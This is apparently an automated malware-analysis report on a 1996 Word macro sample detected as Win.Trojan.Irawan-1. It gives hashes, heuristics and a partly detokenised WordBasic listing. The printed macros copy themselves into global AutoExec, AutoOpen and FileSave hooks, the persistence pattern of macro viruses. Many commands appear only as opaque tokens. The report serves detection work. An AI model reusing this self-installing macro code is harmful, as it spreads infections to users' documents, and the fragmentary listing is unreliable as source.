Win.Trojan.Irawan-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 550a1d41e51d7f38…

MALICIOUS

Office (OLE)

Size: 11.5 KB
First seen: 2012-06-14
MD5: 74b2c75661b0999ed1c0009c67207813
SHA-1: f175e92c6fc2ed36af4946ff702fb14f12ae9ca7
SHA-256: 550a1d41e51d7f38b0164ad01a5b3de15a22ac6116e8327ad1d734a47f6512bc
Risk Score: 102

Malware Insights

Win.Trojan.Irawan-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic

The sample exhibits legacy WordBasic macro-virus markers and is explicitly detected by ClamAV as Win.Trojan.Irawan-1. The document body contains numerous references to 'RSN MACRO VIRUS' and 'MacroShield', indicating functionality related to macro viruses, most likely spreading or removing other macros; in this context, however, the document itself is the malicious payload.

Heuristics (3)

  • ClamAV: Win.Trojan.Irawan-1 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Irawan-1.
  • Legacy WordBasic macro-virus markers [high] OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    The OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen together with ToolsMacro/MacroFile/fileMacro/globMacro, or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • Recovered legacy WordBasic macro source [info] OLE_LEGACY_WORDBASIC_MACRO_SOURCE
    The Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so that its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: wordbasic_macros.txt
Kind: wordbasic-macro
Source: analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source)
Size: 5190 bytes
SHA-256: e4cb9a42306c261e81015f8d5410bb513e3b7aafe41b8cbc90a95bc4e5c9594c

Preview of the extracted script (first 1,000 lines):
, = = = =     11876               11876           21349 21349     11876           21349 21349     11876           20325 8292    
              356 8292 @cmd6e75   REM removes macros identified as a virus. (c) 1996 B. Irawa  
MAIN
REM *********************************************************
REM * MacroShield, macro virus remover                      *
REM * Copyright (c) 1996 B. Irawan D                        * 
REM * 3rd Beta Release in Dec, 9 1996                       *
REM * Thanks to 1. 'Ci, you're my everything...             *
REM *           2. Denny & Dhonny, thank's for your support * 
REM *           3. All of my friend in OS III/96            *
REM *           4. All of my frien in STTTelkom '91         *
REM *********************************************************  
"MacroShield, macro virus remover"
MAIN
, - * Dayeuhkolot
sMe$ = @cmd8025
sMacro$ = SMe$ = ":Autoexec"
@cmd80c2 sMacro$ , "Global:Autoexec"
sMacro$ = sMe$ = ":AutoOpen"
@cmd80c2 sMacro$ , "Global:AutoOpen"
sMacro$ = SMe$ = ":FileSave"
@cmd80c2 sMacro$ , "Global:FileSave"
sMacro$ = SMe$ = ":FileSaveAs"
@cmd80c2 sMacro$ , "Global:FileSaveAs"
sMacro$ = SMe$ = ":FileOpen"
@cmd80c2 sMacro$ , "Global:FileOpen"
sMacro$ = SMe$ = ":MacroShield"
@cmd80c2 sMacro$ , "Global:MacroShield" 29807
MAIN
MacroShield
MAIN
, - * STTTelkom
@cmd0053
dlg @cmd0054
dlg
dlg = 0 dlg = 1
@cmd0054 dlg
sMe$ = @cmd8025
sTMacro$ = sMe$ = ":AutoExec"
@cmd80c2 "Global:AutoExec" , sTMacro$
sTMacro$ = sMe$ = ":AutoOpen"
@cmd80c2 "Global:AutoOpen" , sTMacro$
sTMacro$ = sMe$ = ":FileSave"
@cmd80c2 "Global:FileSave" , sTMacro$
sTMacro$ = sMe$ = ":FileSaveAs"
@cmd80c2 "Global:FileSaveAs" , sTMacro$
sTMacro$ = SMe$ = ":FileOpen"
@cmd80c2 "Global:FileOpen" , STMacro$
sTMacro$ = SMe$ = ":MacroShield"
@cmd80c2 "Global:MacroShield" , STMacro$
* OSIII96 28523
Err 102
@cmd0054 dlg
=
MAIN
, - * STTTelkom
dlg @cmd0054
dlg
dlg
dlg = 0 dlg = 1
@cmd0054 dlg
sMe$ = @cmd8025
sTMacro$ = sMe$ = ":AutoExec"
@cmd80c2 "Global:AutoExec" , sTMacro$
sTMacro$ = sMe$ = ":AutoOpen"
@cmd80c2 "Global:AutoOpen" , sTMacro$
sTMacro$ = sMe$ = ":FileSave"
@cmd80c2 "Global:FileSave" , sTMacro$
sTMacro$ = sMe$ = ":FileSaveAs"
@cmd80c2 "Global:FileSaveAs" , sTMacro$
sTMacro$ = SMe$ = ":FileOpen"
@cmd80c2 "Global:FileOpen" , sTMacro$
sTMacro$ = SMe$ = ":MacroShield"
@cmd80c2 "Global:MacroShield" , STMacro$
* OSIII96 28523
Err 102
@cmd0054 dlg
=
REM *********************************************************
REM * MacroShield, macro virus remover                      *
REM * Copyright (c) 1996 B. Irawan D                        * 
REM * 3rd Beta Release in Dec, 9 1996                       *
REM * Thanks to 1. 'Ci, you're my everything...             *
REM *           2. Denny & Dhonny, thank's for your support * 
REM *           3. All of my friend in OS III/96            *
REM *           4. All of my friend in STTTelkom '91        *
REM *********************************************************  
MAIN
multiFileMsg$ = "Anda tidak dapat membuka beberapa file bersamaan jika  MacroShield terinstal. Yang pertama anda pilih akan dibuka."
spTitle$ = "MacroShield"
@cmd800f @cmd80b5 1 , "Macintosh" 0
wordVerCode = 0
@cmd800f @cmd80b5 1 , "Windows 3." 0
wordVerCode = 1
@cmd8008 @cmd80b5 2 , 1 = "6"
wordVerCode = 2
wordVerCode = 3
@cmd8111 0
@cmd809e
, - * ErrHandler
@cmd80d6 1
, - * 0
* StartOpen
29285
@cmd0209
@cmd80d6 1
Err = 0
dlg @cmd0050
dlg
file$ =
resp = dlg
resp = 0 wordVerCode 3 * EndFunc
fileList$ = Dlg
wordVerCode
1 REM WinWord 6 
@cmd800f fileList$ , " " 0
separator = @cmd800f fileList$ , " "
fnameLen = separator 1
file$ = @cmd800a fileList$ , 1 , fnameLen
Dlg = file$
@cmd802b multiFileMsg$ , spTitle$ , 64
2 REM Winword NT
quotePos = @cmd800f 2 , fileList$ , @cmd8005 34
spacePos = @cmd800f fileList$ , " "
listLen = @cmd8003 fileList$
quotePos = 0 spacePos 0
fnameLen = spacePos 1
file$ = @cmd800a fileList$ , 1 , fnameLen
Dlg = file$
@cmd802b multiFileMsg$ , spTitle$ , 64
quotePos 0 quotePos listLen
fnameLen = quotePos
file$ = @cmd800a fileList$ , 1 , fnameLen
Dlg = file$
@cmd802b multiFileMsg$ , spTitle$ , 64
3 REM Winword 7
Resp = 0
@cmd8003 fileList$ 0
file$ = firstFile$ fileList$
Dlg = file$
@cmd802b multiFileMsg$ , spTitle$ , 64
* EndFunc
dlg = file$
dlg = 1
6501
, - * ErrHandler2
@cmd0050 dlg
, - * 0
* ScreenSwitch
29285
Err = 0
* EndFunc
=
file$ = @cmd8025
DlgFSA @cmd0054
DlgFSA
DlgFSA = 1 @cmd80b7 1 0 screenOpen file$
@cmd809e 0
, - * ErrHandler3
@cmd80d6 0
* EndFunc
29285
@cmd0209
@cmd80d6 0
Err = 0
=
screenOpen file$
autoopen$ = "autoopen"
HasAutoOpen = 0
MacroCount = @cmd80b7 1
i = 1 MacroCount
MacName$ = @cmd80b8 i , 1
@cmd80b0 MacName$ = autoopen$ HasAutoOpen = 1
i
OpenItClean file$ =
OpenItClean file$
@cmd80a0 2
, - * ErrHandler
@cmd004f = file$
, - * ErrHandler
@cmd0057 =
, - * 0
, - * ErrHandler2
@cmd8024
* EndFunc
29285
@cmd0209
@cmd0057 =
@cmd8024
Err = 0
29285
Err = 0 =
@cmd0054 = file$
firstFile$ FileList$
@cmd8008 FileList$ , 1 = @cmd8005 34
separator = @cmd800f 2 , FileList$ , @cmd8005 34
fnameLen = separator 2
firstFile$ = @cmd800a FileList$ , 2 , fnameLen
separator = @cmd800f FileList$ , " "
fnameLen = separator 1
firstFile$ = @cmd800a FileList$ , 1 , fnameLen